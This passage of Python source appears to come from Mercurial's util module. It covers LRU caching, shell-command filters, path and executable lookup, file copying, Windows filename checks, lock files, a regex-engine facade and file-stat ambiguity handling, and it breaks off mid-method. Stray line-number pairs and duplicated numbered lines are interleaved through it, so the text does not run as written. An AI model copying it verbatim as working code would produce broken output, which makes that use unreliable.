        # lazily (up to ``max``) by _addcapacity().
        self._head = head = _lrucachenode()
        head.prev = head
        head.next = head
        self._size = 1
        self._capacity = max

    def __len__(self):
        return len(self._cache)

    def __contains__(self, k):
        return k in self._cache

    def __iter__(self):
        # We don't have to iterate in cache order, but why not.
        n = self._head
        for i in range(len(self._cache)):
            yield n.key
            n = n.next

    def __getitem__(self, k):
        # A lookup counts as an access: promote the node to head.
        node = self._cache[k]
        self._movetohead(node)
        return node.value

    def __setitem__(self, k, v):
        node = self._cache.get(k)
        # Replace existing value and mark as newest.
        if node is not None:
            node.value = v
            self._movetohead(node)
            return

        if self._size < self._capacity:
            node = self._addcapacity()
        else:
            # Grab the last/oldest item.
            node = self._head.prev

            # At capacity. Kill the old entry.
            if node.key is not _notset:
                del self._cache[node.key]

        node.key = k
        node.value = v
        self._cache[k] = node
        # And mark it as newest entry. No need to adjust order since it
        # is already self._head.prev.
        self._head = node

    def __delitem__(self, k):
        node = self._cache.pop(k)
        node.markempty()

        # Temporarily mark as newest item before re-adjusting head to make
        # this node the oldest item.
        self._movetohead(node)
        self._head = node.next

    # Additional dict methods.

    def get(self, k, default=None):
        # Note: unlike __getitem__, get() does NOT promote the entry.
        try:
            return self._cache[k].value
        except KeyError:
            return default

    def clear(self):
        # Empty every occupied node but keep the node ring allocated.
        n = self._head
        while n.key is not _notset:
            n.markempty()
            n = n.next

        self._cache.clear()

    def copy(self):
        result = lrucachedict(self._capacity)
        n = self._head.prev
        # Iterate in oldest-to-newest order, so the copy has the right ordering
        for i in range(len(self._cache)):
            result[n.key] = n.value
            n = n.prev
        return result

    def _movetohead(self, node):
        """Mark a node as the newest, making it the new head.

        When a node is accessed, it becomes the freshest entry in the LRU
        list, which is denoted by self._head.

        Visually, let's make ``N`` the new head node (* denotes head):

            previous/oldest <-> head <-> next/next newest

            ----<->--- A* ---<->-----
            |                       |
            E <-> D <-> N <-> C <-> B

        To:

            ----<->--- N* ---<->-----
            |                       |
            E <-> D <-> C <-> B <-> A

        This requires the following moves:

           C.next = D  (node.prev.next = node.next)
           D.prev = C  (node.next.prev = node.prev)
           E.next = N  (head.prev.next = node)
           N.prev = E  (node.prev = head.prev)
           N.next = A  (node.next = head)
           A.prev = N  (head.prev = node)
        """
        head = self._head
        # C.next = D
        node.prev.next = node.next
        # D.prev = C
        node.next.prev = node.prev
        # N.prev = E
        node.prev = head.prev
        # N.next = A
        # It is tempting to do just "head" here, however if node is
        # adjacent to head, this will do bad things.
        node.next = head.prev.next
        # E.next = N
        node.next.prev = node
        # A.prev = N
        node.prev.next = node

        self._head = node

    def _addcapacity(self):
        """Add a node to the circular linked list.

        The new node is inserted before the head node.
        """
        head = self._head
        node = _lrucachenode()
        head.prev.next = node
        node.prev = head.prev
        node.next = head
        head.prev = node
        self._size += 1
        return node
831
828
def lrucachefunc(func):
    '''cache most recent results of function calls'''
    # Maps argument (or argument tuple) -> result; ``usage`` tracks
    # recency, oldest entries at the left.
    results = {}
    usage = collections.deque()
    if func.__code__.co_argcount == 1:
        # Unary functions are keyed on the bare argument to avoid
        # tuple-packing overhead.
        def f(arg):
            if arg in results:
                usage.remove(arg)
            else:
                # Evict the least recently used entry past 20 items.
                if len(results) > 20:
                    del results[usage.popleft()]
                results[arg] = func(arg)
            usage.append(arg)
            return results[arg]
    else:
        def f(*args):
            if args in results:
                usage.remove(args)
            else:
                if len(results) > 20:
                    del results[usage.popleft()]
                results[args] = func(*args)
            usage.append(args)
            return results[args]

    return f
858
855
class propertycache(object):
    """Descriptor that computes an attribute once and caches the result.

    The first access runs the decorated function and stores the value in
    the instance __dict__, so later accesses bypass the descriptor
    entirely.
    """
    def __init__(self, func):
        self.func = func
        self.name = func.__name__

    def __get__(self, obj, type=None):
        """Compute the value for ``obj``, cache it, and return it."""
        value = self.func(obj)
        self.cachevalue(obj, value)
        return value

    def cachevalue(self, obj, value):
        """Store ``value`` on ``obj`` under the decorated function's name."""
        # __dict__ assignment required to bypass __setattr__ (eg: repoview)
        obj.__dict__[self.name] = value
871
868
def pipefilter(s, cmd):
    '''filter string S through command CMD, returning its output'''
    # stderr is not captured, so it flows through to the caller's stderr;
    # communicate() therefore always returns None for perr here.
    p = subprocess.Popen(cmd, shell=True, close_fds=closefds,
                         stdin=subprocess.PIPE, stdout=subprocess.PIPE)
    pout, perr = p.communicate(s)
    return pout
878
875
def tempfilter(s, cmd):
    '''filter string S through a pair of temporary files with CMD.
    CMD is used as a template to create the real command to be run,
    with the strings INFILE and OUTFILE replaced by the real names of
    the temporary files generated.'''
    inname, outname = None, None
    try:
        # Write the input to a temp file, reserve a second temp file for
        # the output, then run CMD with both names substituted in.
        infd, inname = tempfile.mkstemp(prefix='hg-filter-in-')
        fp = os.fdopen(infd, pycompat.sysstr('wb'))
        fp.write(s)
        fp.close()
        outfd, outname = tempfile.mkstemp(prefix='hg-filter-out-')
        os.close(outfd)
        cmd = cmd.replace('INFILE', inname)
        cmd = cmd.replace('OUTFILE', outname)
        code = os.system(cmd)
        # On OpenVMS an odd status means success.
        if pycompat.sysplatform == 'OpenVMS' and code & 1:
            code = 0
        if code:
            raise Abort(_("command '%s' failed: %s") %
                        (cmd, explainexit(code)))
        return readfile(outname)
    finally:
        # Best-effort cleanup of both temp files.
        try:
            if inname:
                os.unlink(inname)
        except OSError:
            pass
        try:
            if outname:
                os.unlink(outname)
        except OSError:
            pass
912
909
# Maps a command prefix to the filter strategy used by filter() below.
filtertable = {
    'tempfile:': tempfilter,
    'pipe:': pipefilter,
}
917
914
def filter(s, cmd):
    "filter a string through a command that transforms its input to its output"
    # Dispatch on an explicit 'tempfile:' or 'pipe:' prefix; anything
    # else defaults to the pipe strategy.
    for name, fn in filtertable.iteritems():
        if cmd.startswith(name):
            return fn(s, cmd[len(name):].lstrip())
    return pipefilter(s, cmd)
924
921
def binary(s):
    """return true if a string is binary data"""
    # A NUL byte anywhere in the payload marks the content as binary;
    # empty input is considered non-binary.
    if not s:
        return False
    return '\0' in s
928
925
def increasingchunks(source, min=1024, max=65536):
    '''return no less than min bytes per chunk while data remains,
    doubling min after each chunk until it reaches max'''
    pending = []
    pendingsize = 0
    for chunk in source:
        pending.append(chunk)
        pendingsize += len(chunk)
        if pendingsize >= min:
            if min < max:
                # Grow the threshold: at least double it, and jump
                # straight to the largest power of two not exceeding the
                # chunk just emitted, capped at max.
                min = min << 1
                if pendingsize:
                    nmin = 1 << (pendingsize.bit_length() - 1)
                else:
                    nmin = 1
                if nmin > min:
                    min = nmin
                if min > max:
                    min = max
            yield ''.join(pending)
            pendingsize = 0
            pending = []
    # Flush whatever is left, even if it is smaller than min.
    if pending:
        yield ''.join(pending)
959
956
# Convenience alias so util users can raise/catch Abort without
# importing the error module directly.
Abort = error.Abort
961
958
def always(fn):
    """Predicate that accepts every input (the argument is ignored)."""
    return True
964
961
def never(fn):
    """Predicate that rejects every input (the argument is ignored)."""
    return False
967
964
def nogc(func):
    """disable garbage collector

    Python's garbage collector triggers a GC each time a certain number of
    container objects (the number being defined by gc.get_threshold()) are
    allocated even when marked not to be tracked by the collector. Tracking
    has no effect on when GCs are triggered, only on what objects the GC
    looks into. As a workaround, disable GC while building complex (huge)
    containers.

    This garbage collector issue has been fixed in 2.7, but it still
    affects CPython's performance.
    """
    def inner(*args, **kwargs):
        wasenabled = gc.isenabled()
        gc.disable()
        try:
            return func(*args, **kwargs)
        finally:
            # Only re-enable collection if the caller had it on.
            if wasenabled:
                gc.enable()
    return inner
990
987
if pycompat.ispypy:
    # PyPy runs slower with gc disabled
    nogc = lambda x: x
994
991
def pathto(root, n1, n2):
    '''return the relative path from one place to another.
    root should use os.sep to separate directories
    n1 should use os.sep to separate directories
    n2 should use "/" to separate directories
    returns an os.sep-separated path.

    If n1 is a relative path, it's assumed it's
    relative to root.
    n2 should always be relative to root.
    '''
    if not n1:
        return localpath(n2)
    if os.path.isabs(n1):
        if os.path.splitdrive(root)[0] != os.path.splitdrive(n1)[0]:
            # Different drives (Windows): no relative path exists, so
            # fall back to an absolute one.
            return os.path.join(root, localpath(n2))
        n2 = '/'.join((pconvert(root), n2))
    a, b = splitpath(n1), n2.split('/')
    a.reverse()
    b.reverse()
    # Strip the common leading components of both paths.
    while a and b and a[-1] == b[-1]:
        a.pop()
        b.pop()
    b.reverse()
    # Climb out of what remains of n1, then descend into n2.
    return pycompat.ossep.join((['..'] * len(a)) + b) or '.'
1020
1017
def mainfrozen():
    """return True if we are a frozen executable.

    The code supports py2exe (most common, Windows only) and tools/freeze
    (portable, not much used).
    """
    return (safehasattr(sys, "frozen") or # new py2exe
            safehasattr(sys, "importers") or # old py2exe
            imp.is_frozen(u"__main__")) # tools/freeze
1030
1027
# the location of data files matching the source code
if mainfrozen() and getattr(sys, 'frozen', None) != 'macosx_app':
    # executable version (py2exe) doesn't support __file__
    datapath = os.path.dirname(pycompat.sysexecutable)
else:
    datapath = os.path.dirname(pycompat.fsencode(__file__))

# Tell the i18n machinery where translations live.
i18n.setdatapath(datapath)
1039
1036
# Cached path of the 'hg' executable; lazily initialized by hgexecutable().
_hgexecutable = None
1041
1038
def hgexecutable():
    """return location of the 'hg' executable.

    Defaults to $HG or 'hg' in the search path.
    """
    if _hgexecutable is None:
        hg = encoding.environ.get('HG')
        mainmod = sys.modules[pycompat.sysstr('__main__')]
        if hg:
            # Explicit override via the HG environment variable.
            _sethgexecutable(hg)
        elif mainfrozen():
            if getattr(sys, 'frozen', None) == 'macosx_app':
                # Env variable set by py2app
                _sethgexecutable(encoding.environ['EXECUTABLEPATH'])
            else:
                _sethgexecutable(pycompat.sysexecutable)
        elif (os.path.basename(
            pycompat.fsencode(getattr(mainmod, '__file__', ''))) == 'hg'):
            # Running from the 'hg' script itself.
            _sethgexecutable(pycompat.fsencode(mainmod.__file__))
        else:
            # Last resort: search PATH, then fall back to argv[0].
            exe = findexe('hg') or os.path.basename(sys.argv[0])
            _sethgexecutable(exe)
    return _hgexecutable
1065
1062
def _sethgexecutable(path):
    """set location of the 'hg' executable"""
    global _hgexecutable
    _hgexecutable = path
1070
1067
1071 def _isstdout(f):
1068 def _isstdout(f):
1072 fileno = getattr(f, 'fileno', None)
1069 fileno = getattr(f, 'fileno', None)
1073 return fileno and fileno() == sys.__stdout__.fileno()
1070 return fileno and fileno() == sys.__stdout__.fileno()
1074
1071
def shellenviron(environ=None):
    """return environ with optional override, useful for shelling out"""
    def py2shell(val):
        'convert python object into string that is useful to shell'
        # None/False -> '0', True -> '1', everything else str()'d.
        if val is None or val is False:
            return '0'
        if val is True:
            return '1'
        return str(val)
    env = dict(encoding.environ)
    if environ:
        env.update((k, py2shell(v)) for k, v in environ.iteritems())
    # Always advertise the hg executable to child processes.
    env['HG'] = hgexecutable()
    return env
1089
1086
def system(cmd, environ=None, cwd=None, out=None):
    '''enhanced shell command execution.
    run with environment maybe modified, maybe in different dir.

    if out is specified, it is assumed to be a file-like object that has a
    write() method. stdout and stderr will be redirected to out.'''
    try:
        # Flush our own buffered stdout so child output interleaves sanely.
        stdout.flush()
    except Exception:
        pass
    cmd = quotecommand(cmd)
    env = shellenviron(environ)
    if out is None or _isstdout(out):
        # Child writes straight to our stdout; no capture needed.
        rc = subprocess.call(cmd, shell=True, close_fds=closefds,
                             env=env, cwd=cwd)
    else:
        # Capture stdout+stderr and copy them line by line into ``out``.
        proc = subprocess.Popen(cmd, shell=True, close_fds=closefds,
                                env=env, cwd=cwd, stdout=subprocess.PIPE,
                                stderr=subprocess.STDOUT)
        for line in iter(proc.stdout.readline, ''):
            out.write(line)
        proc.wait()
        rc = proc.returncode
    # On OpenVMS an odd status means success.
    if pycompat.sysplatform == 'OpenVMS' and rc & 1:
        rc = 0
    return rc
1116
1113
def checksignature(func):
    '''wrap a function with code to check for calling errors'''
    def check(*args, **kwargs):
        try:
            return func(*args, **kwargs)
        except TypeError:
            # A traceback of depth 1 means the TypeError came from the
            # call itself (bad arguments), not from inside func's body.
            if len(traceback.extract_tb(sys.exc_info()[2])) == 1:
                raise error.SignatureError
            raise

    return check
1128
1125
# a whitelist of known filesystems where hardlinks work reliably
_hardlinkfswhitelist = {
    'btrfs',
    'ext2',
    'ext3',
    'ext4',
    'hfs',
    'jfs',
    'reiserfs',
    'tmpfs',
    'ufs',
    'xfs',
    'zfs',
}
1143
1140
def copyfile(src, dest, hardlink=False, copystat=False, checkambig=False):
    '''copy a file, preserving mode and optionally other stat info like
    atime/mtime

    checkambig argument is used with filestat, and is useful only if
    destination file is guarded by any lock (e.g. repo.lock or
    repo.wlock).

    copystat and checkambig should be exclusive.
    '''
    assert not (copystat and checkambig)
    oldstat = None
    if os.path.lexists(dest):
        if checkambig:
            oldstat = checkambig and filestat.frompath(dest)
        unlink(dest)
    if hardlink:
        # Hardlinks are problematic on CIFS (issue4546), do not allow hardlinks
        # unless we are confident that dest is on a whitelisted filesystem.
        try:
            fstype = getfstype(os.path.dirname(dest))
        except OSError:
            fstype = None
        if fstype not in _hardlinkfswhitelist:
            hardlink = False
    if hardlink:
        try:
            oslink(src, dest)
            return
        except (IOError, OSError):
            pass # fall back to normal copy
    if os.path.islink(src):
        os.symlink(os.readlink(src), dest)
        # copytime is ignored for symlinks, but in general copytime isn't needed
        # for them anyway
    else:
        try:
            shutil.copyfile(src, dest)
            if copystat:
                # copystat also copies mode
                shutil.copystat(src, dest)
            else:
                shutil.copymode(src, dest)
                if oldstat and oldstat.stat:
                    newstat = filestat.frompath(dest)
                    if newstat.isambig(oldstat):
                        # stat of copied file is ambiguous to original one
                        # advance mtime by one second to disambiguate
                        advanced = (oldstat.stat.st_mtime + 1) & 0x7fffffff
                        os.utime(dest, (advanced, advanced))
        except shutil.Error as inst:
            raise Abort(str(inst))
1195
1192
def copyfiles(src, dst, hardlink=None, progress=lambda t, pos: None):
    """Copy a directory tree using hardlinks if possible."""
    num = 0

    gettopic = lambda: hardlink and _('linking') or _('copying')

    if os.path.isdir(src):
        if hardlink is None:
            # Only attempt hardlinks when src and dst share a device.
            hardlink = (os.stat(src).st_dev ==
                        os.stat(os.path.dirname(dst)).st_dev)
        topic = gettopic()
        os.mkdir(dst)
        for name, kind in listdir(src):
            srcname = os.path.join(src, name)
            dstname = os.path.join(dst, name)
            def nprog(t, pos):
                # Offset child progress by the files already handled.
                if pos is not None:
                    return progress(t, pos + num)
            hardlink, n = copyfiles(srcname, dstname, hardlink, progress=nprog)
            num += n
    else:
        if hardlink is None:
            hardlink = (os.stat(os.path.dirname(src)).st_dev ==
                        os.stat(os.path.dirname(dst)).st_dev)
        topic = gettopic()

        if hardlink:
            try:
                oslink(src, dst)
            except (IOError, OSError):
                # Link failed; degrade to copying for this and later files.
                hardlink = False
                shutil.copy(src, dst)
        else:
            shutil.copy(src, dst)
        num += 1
        progress(topic, num)
    progress(topic, None)

    return hardlink, num
1235
1232
# Windows device names that cannot be used as file names, and characters
# that are invalid in Windows file names; consumed by checkwinfilename().
_winreservednames = b'''con prn aux nul
com1 com2 com3 com4 com5 com6 com7 com8 com9
lpt1 lpt2 lpt3 lpt4 lpt5 lpt6 lpt7 lpt8 lpt9'''.split()
_winreservedchars = ':*?"<>|'
1240 def checkwinfilename(path):
1237 def checkwinfilename(path):
1241 r'''Check that the base-relative path is a valid filename on Windows.
1238 r'''Check that the base-relative path is a valid filename on Windows.
1242 Returns None if the path is ok, or a UI string describing the problem.
1239 Returns None if the path is ok, or a UI string describing the problem.
1243
1240
1244 >>> checkwinfilename("just/a/normal/path")
1241 >>> checkwinfilename("just/a/normal/path")
1245 >>> checkwinfilename("foo/bar/con.xml")
1242 >>> checkwinfilename("foo/bar/con.xml")
1246 "filename contains 'con', which is reserved on Windows"
1243 "filename contains 'con', which is reserved on Windows"
1247 >>> checkwinfilename("foo/con.xml/bar")
1244 >>> checkwinfilename("foo/con.xml/bar")
1248 "filename contains 'con', which is reserved on Windows"
1245 "filename contains 'con', which is reserved on Windows"
1249 >>> checkwinfilename("foo/bar/xml.con")
1246 >>> checkwinfilename("foo/bar/xml.con")
1250 >>> checkwinfilename("foo/bar/AUX/bla.txt")
1247 >>> checkwinfilename("foo/bar/AUX/bla.txt")
1251 "filename contains 'AUX', which is reserved on Windows"
1248 "filename contains 'AUX', which is reserved on Windows"
1252 >>> checkwinfilename("foo/bar/bla:.txt")
1249 >>> checkwinfilename("foo/bar/bla:.txt")
1253 "filename contains ':', which is reserved on Windows"
1250 "filename contains ':', which is reserved on Windows"
1254 >>> checkwinfilename("foo/bar/b\07la.txt")
1251 >>> checkwinfilename("foo/bar/b\07la.txt")
1255 "filename contains '\\x07', which is invalid on Windows"
1252 "filename contains '\\x07', which is invalid on Windows"
1256 >>> checkwinfilename("foo/bar/bla ")
1253 >>> checkwinfilename("foo/bar/bla ")
1257 "filename ends with ' ', which is not allowed on Windows"
1254 "filename ends with ' ', which is not allowed on Windows"
1258 >>> checkwinfilename("../bar")
1255 >>> checkwinfilename("../bar")
1259 >>> checkwinfilename("foo\\")
1256 >>> checkwinfilename("foo\\")
1260 "filename ends with '\\', which is invalid on Windows"
1257 "filename ends with '\\', which is invalid on Windows"
1261 >>> checkwinfilename("foo\\/bar")
1258 >>> checkwinfilename("foo\\/bar")
1262 "directory name ends with '\\', which is invalid on Windows"
1259 "directory name ends with '\\', which is invalid on Windows"
1263 '''
1260 '''
1264 if path.endswith('\\'):
1261 if path.endswith('\\'):
1265 return _("filename ends with '\\', which is invalid on Windows")
1262 return _("filename ends with '\\', which is invalid on Windows")
1266 if '\\/' in path:
1263 if '\\/' in path:
1267 return _("directory name ends with '\\', which is invalid on Windows")
1264 return _("directory name ends with '\\', which is invalid on Windows")
1268 for n in path.replace('\\', '/').split('/'):
1265 for n in path.replace('\\', '/').split('/'):
1269 if not n:
1266 if not n:
1270 continue
1267 continue
1271 for c in _filenamebytestr(n):
1268 for c in _filenamebytestr(n):
1272 if c in _winreservedchars:
1269 if c in _winreservedchars:
1273 return _("filename contains '%s', which is reserved "
1270 return _("filename contains '%s', which is reserved "
1274 "on Windows") % c
1271 "on Windows") % c
1275 if ord(c) <= 31:
1272 if ord(c) <= 31:
1276 return _("filename contains %r, which is invalid "
1273 return _("filename contains %r, which is invalid "
1277 "on Windows") % c
1274 "on Windows") % c
1278 base = n.split('.')[0]
1275 base = n.split('.')[0]
1279 if base and base.lower() in _winreservednames:
1276 if base and base.lower() in _winreservednames:
1280 return _("filename contains '%s', which is reserved "
1277 return _("filename contains '%s', which is reserved "
1281 "on Windows") % base
1278 "on Windows") % base
1282 t = n[-1]
1279 t = n[-1]
1283 if t in '. ' and n not in '..':
1280 if t in '. ' and n not in '..':
1284 return _("filename ends with '%s', which is not allowed "
1281 return _("filename ends with '%s', which is not allowed "
1285 "on Windows") % t
1282 "on Windows") % t
1286
1283
# Pick platform-appropriate filename validation and the best wall-clock
# timer available for profiling/measurement.
if pycompat.osname == 'nt':
    checkosfilename = checkwinfilename
    timer = time.clock
else:
    checkosfilename = platform.checkosfilename
    timer = time.time

if safehasattr(time, "perf_counter"):
    # Python 3.3+: perf_counter is monotonic and high-resolution,
    # superior to both time.clock and time.time for interval timing
    timer = time.perf_counter
1296
1293
def makelock(info, pathname):
    """Create a lock at pathname whose payload is info.

    A symlink is preferred (creation is atomic and the payload is read
    back via readlink). If symlinks are unsupported, or creation fails
    for any reason other than the lock already existing, fall back to
    exclusively creating a regular file holding info.
    """
    try:
        return os.symlink(info, pathname)
    except OSError as err:
        # EEXIST means somebody else holds the lock; propagate that.
        # Any other error (e.g. filesystem without symlinks) falls
        # through to the regular-file fallback below.
        if err.errno == errno.EEXIST:
            raise
    except AttributeError: # no symlink in os
        pass

    fd = os.open(pathname, os.O_CREAT | os.O_WRONLY | os.O_EXCL)
    os.write(fd, info)
    os.close(fd)
1309
1306
def readlock(pathname):
    """Return the payload stored in the lock at pathname.

    Reads the symlink target when the lock is a symlink; otherwise
    falls back to reading the regular file created by makelock.
    """
    try:
        return os.readlink(pathname)
    except OSError as err:
        # EINVAL: not a symlink; ENOSYS: symlinks unsupported here.
        # Both mean "use the file fallback"; anything else is fatal.
        if err.errno not in (errno.EINVAL, errno.ENOSYS):
            raise
    except AttributeError: # no symlink in os
        pass
    fp = posixfile(pathname)
    data = fp.read()
    fp.close()
    return data
1322
1319
def fstat(fp):
    '''stat file object that may not have fileno method.'''
    try:
        fno = fp.fileno()
    except AttributeError:
        # no file descriptor available; stat by name instead
        return os.stat(fp.name)
    return os.fstat(fno)
1329
1326
1330 # File system features
1327 # File system features
1331
1328
def fscasesensitive(path):
    """
    Return true if the given path is on a case-sensitive filesystem

    Requires a path (like /foo/.hg) ending with a foldable final
    directory component.
    """
    st1 = os.lstat(path)
    dirname, base = os.path.split(path)
    folded = base.upper()
    if folded == base:
        folded = base.lower()
    if folded == base:
        # name has no case to fold: no evidence against case sensitivity
        return True
    sibling = os.path.join(dirname, folded)
    try:
        st2 = os.lstat(sibling)
    except OSError:
        # the case-folded twin doesn't exist => case-sensitive
        return True
    # same inode under both spellings => case-insensitive
    if st2 == st1:
        return False
    return True
1354
1351
# Optional re2 support: _re2 is a tri-state module global.
#   None  -> re2 imported but not yet probed
#   False -> re2 unavailable or broken
#   True  -> re2 imported and verified working
try:
    import re2
    _re2 = None
except ImportError:
    _re2 = False

class _re(object):
    """Facade over the regex engine: dispatches to re2 when available
    and compatible, falling back to the stdlib re module (remod)."""
    def _checkre2(self):
        # Probe re2 once and cache the verdict in the module global.
        global _re2
        try:
            # check if match works, see issue3964
            _re2 = bool(re2.match(r'\[([^\[]+)\]', '[ui]'))
        except ImportError:
            _re2 = False

    def compile(self, pat, flags=0):
        '''Compile a regular expression, using re2 if possible

        For best performance, use only re2-compatible regexp features. The
        only flags from the re module that are re2-compatible are
        IGNORECASE and MULTILINE.'''
        if _re2 is None:
            self._checkre2()
        # only hand the pattern to re2 when no unsupported flags are set
        if _re2 and (flags & ~(remod.IGNORECASE | remod.MULTILINE)) == 0:
            # re2 takes flags as inline pattern prefixes, not arguments
            if flags & remod.IGNORECASE:
                pat = '(?i)' + pat
            if flags & remod.MULTILINE:
                pat = '(?m)' + pat
            try:
                return re2.compile(pat)
            except re2.error:
                # pattern uses a feature re2 lacks; fall back to re
                pass
        return remod.compile(pat, flags)

    @propertycache
    def escape(self):
        '''Return the version of escape corresponding to self.compile.

        This is imperfect because whether re2 or re is used for a particular
        function depends on the flags, etc, but it's the best we can do.
        '''
        global _re2
        if _re2 is None:
            self._checkre2()
        if _re2:
            return re2.escape
        else:
            return remod.escape

# module-level singleton; callers use util.re.compile / util.re.escape
re = _re()
1405
1402
# cache of directory -> {normcased name: on-disk name} listings
_fspathcache = {}
def fspath(name, root):
    '''Get name in the case stored in the filesystem

    The name should be relative to root, and be normcase-ed for efficiency.

    Note that this function is unnecessary, and should not be
    called, for case-sensitive filesystems (simply because it's expensive).

    The root should be normcase-ed, too.
    '''
    def _makefspathcacheentry(dir):
        # map normcased entry -> actual on-disk spelling
        return dict((normcase(n), n) for n in os.listdir(dir))

    seps = pycompat.ossep
    if pycompat.osaltsep:
        seps = seps + pycompat.osaltsep
    # Protect backslashes. This gets silly very quickly.
    # BUG FIX: the previous code called seps.replace(...) and discarded
    # the result (str/bytes are immutable, replace returns a new object),
    # so '\' was never escaped and acted as an escape character inside
    # the regex character classes below ('[\/]' matches only '/').
    # Assign the escaped result so a literal backslash matches itself.
    # (bytes literals work for both py2 str and py3 bytes separators)
    seps = seps.replace(b'\\', b'\\\\')
    pattern = remod.compile(br'([^%s]+)|([%s]+)' % (seps, seps))
    dir = os.path.normpath(root)
    result = []
    for part, sep in pattern.findall(name):
        if sep:
            # separator runs pass through unchanged
            result.append(sep)
            continue

        if dir not in _fspathcache:
            _fspathcache[dir] = _makefspathcacheentry(dir)
        contents = _fspathcache[dir]

        found = contents.get(part)
        if not found:
            # retry "once per directory" per "dirstate.walk" which
            # may take place for each patches of "hg qpush", for example
            _fspathcache[dir] = contents = _makefspathcacheentry(dir)
            found = contents.get(part)

        # fall back to the normcased spelling if nothing is on disk
        result.append(found or part)
        dir = os.path.join(dir, part)

    return ''.join(result)
1448
1445
def getfstype(dirpath):
    '''Get the filesystem type name from a directory (best-effort)

    Returns None if we are unsure. Raises OSError on ENOENT, EPERM, etc.
    '''
    # osutil.getfstype only exists on some platforms/builds
    impl = getattr(osutil, 'getfstype', None)
    if impl is None:
        return None
    return impl(dirpath)
1455
1452
def checknlink(testfile):
    '''check whether hardlink count reporting works properly'''

    # testfile may be open, so we need a separate file for checking to
    # work around issue2543 (or testfile may get lost on Samba shares)
    probe1 = testfile + ".hgtmp1"
    if os.path.lexists(probe1):
        return False
    try:
        posixfile(probe1, 'w').close()
    except IOError:
        # couldn't even create the probe; clean up and report failure
        try:
            os.unlink(probe1)
        except OSError:
            pass
        return False

    probe2 = testfile + ".hgtmp2"
    fd = None
    try:
        oslink(probe1, probe2)
        # nlinks() may behave differently for files on Windows shares if
        # the file is open.
        fd = posixfile(probe2)
        return nlinks(probe2) > 1
    except OSError:
        return False
    finally:
        if fd is not None:
            fd.close()
        for probe in (probe1, probe2):
            try:
                os.unlink(probe)
            except OSError:
                pass
1491
1488
def endswithsep(path):
    '''Check path ends with os.sep or os.altsep.

    NOTE: the boolean chain may return a non-bool (e.g. '' when
    osaltsep is empty); callers rely on truthiness only.
    '''
    return (path.endswith(pycompat.ossep)
            or pycompat.osaltsep and path.endswith(pycompat.osaltsep))
1496
1493
def splitpath(path):
    '''Split path by os.sep.
    Note that this function does not use os.altsep because this is
    an alternative of simple "xxx.split(os.sep)".
    It is recommended to use os.path.normpath() before using this
    function if need.'''
    return path.split(pycompat.ossep)
1504
1501
def gui():
    '''Are we running in a GUI?'''
    if pycompat.sysplatform != 'darwin':
        # elsewhere: Windows always has a GUI; X11 needs $DISPLAY
        return pycompat.osname == "nt" or encoding.environ.get("DISPLAY")
    if 'SSH_CONNECTION' in encoding.environ:
        # handle SSH access to a box where the user is logged in
        return False
    if getattr(osutil, 'isgui', None):
        # check if a CoreGraphics session is available
        return osutil.isgui()
    # pure build; use a safe default
    return True
1519
1516
def mktempcopy(name, emptyok=False, createmode=None):
    """Create a temporary file with the same contents from name

    The permission bits are copied from the original file.

    If the temporary file is going to be truncated immediately, you
    can use emptyok=True as an optimization.

    Returns the name of the temporary file.
    """
    d, fn = os.path.split(name)
    # temp file lives in the same directory so the eventual rename is atomic
    fd, temp = tempfile.mkstemp(prefix='.%s-' % fn, dir=d)
    os.close(fd)
    # Temporary files are created with mode 0600, which is usually not
    # what we want. If the original file already exists, just copy
    # its mode. Otherwise, manually obey umask.
    copymode(name, temp, createmode)
    if emptyok:
        return temp
    try:
        try:
            ifp = posixfile(name, "rb")
        except IOError as inst:
            if inst.errno == errno.ENOENT:
                # original doesn't exist: the empty temp file stands in
                return temp
            if not getattr(inst, 'filename', None):
                inst.filename = name
            raise
        ofp = posixfile(temp, "wb")
        for chunk in filechunkiter(ifp):
            ofp.write(chunk)
        ifp.close()
        ofp.close()
    except: # re-raises
        # on any failure, remove the partial temp file before re-raising
        try: os.unlink(temp)
        except OSError: pass
        raise
    return temp
1558
1555
class filestat(object):
    """help to exactly detect change of a file

    'stat' attribute is result of 'os.stat()' if specified 'path'
    exists. Otherwise, it is None. This can avoid preparative
    'exists()' examination on client side of this class.
    """
    def __init__(self, stat):
        self.stat = stat

    @classmethod
    def frompath(cls, path):
        """Build a filestat for path; stat is None if path is missing."""
        try:
            st = os.stat(path)
        except OSError as err:
            if err.errno != errno.ENOENT:
                raise
            st = None
        return cls(st)

    @classmethod
    def fromfp(cls, fp):
        """Build a filestat from an already-open file object."""
        return cls(os.fstat(fp.fileno()))

    __hash__ = object.__hash__

    def __eq__(self, old):
        try:
            # if ambiguity between stat of new and old file is
            # avoided, comparison of size, ctime and mtime is enough
            # to exactly detect change of a file regardless of platform
            return (self.stat.st_size == old.stat.st_size and
                    self.stat.st_ctime == old.stat.st_ctime and
                    self.stat.st_mtime == old.stat.st_mtime)
        except AttributeError:
            pass
        try:
            # two missing files (stat is None on both sides) are equal
            return self.stat is None and old.stat is None
        except AttributeError:
            return False

    def isambig(self, old):
        """Examine whether new (= self) stat is ambiguous against old one

        "S[N]" below means stat of a file at N-th change:

        - S[n-1].ctime < S[n].ctime: can detect change of a file
        - S[n-1].ctime == S[n].ctime
          - S[n-1].ctime < S[n].mtime: means natural advancing (*1)
          - S[n-1].ctime == S[n].mtime: is ambiguous (*2)
          - S[n-1].ctime > S[n].mtime: never occurs naturally (don't care)
        - S[n-1].ctime > S[n].ctime: never occurs naturally (don't care)

        Case (*2) above means that a file was changed twice or more at
        same time in sec (= S[n-1].ctime), and comparison of timestamp
        is ambiguous.

        Base idea to avoid such ambiguity is "advance mtime 1 sec, if
        timestamp is ambiguous".

        But advancing mtime only in case (*2) doesn't work as
        expected, because naturally advanced S[n].mtime in case (*1)
        might be equal to manually advanced S[n-1 or earlier].mtime.

        Therefore, all "S[n-1].ctime == S[n].ctime" cases should be
        treated as ambiguous regardless of mtime, to avoid overlooking
        by confliction between such mtime.

        Advancing mtime "if isambig(oldstat)" ensures "S[n-1].mtime !=
        S[n].mtime", even if size of a file isn't changed.
        """
        try:
            return (self.stat.st_ctime == old.stat.st_ctime)
        except AttributeError:
            return False

    def avoidambig(self, path, old):
        """Change file stat of specified path to avoid ambiguity

        'old' should be previous filestat of 'path'.

        This skips avoiding ambiguity, if a process doesn't have
        appropriate privileges for 'path'. This returns False in this
        case.

        Otherwise, this returns True, as "ambiguity is avoided".
        """
        # keep mtime within signed 32-bit range
        advanced = (old.stat.st_mtime + 1) & 0x7fffffff
        try:
            os.utime(path, (advanced, advanced))
        except OSError as inst:
            if inst.errno == errno.EPERM:
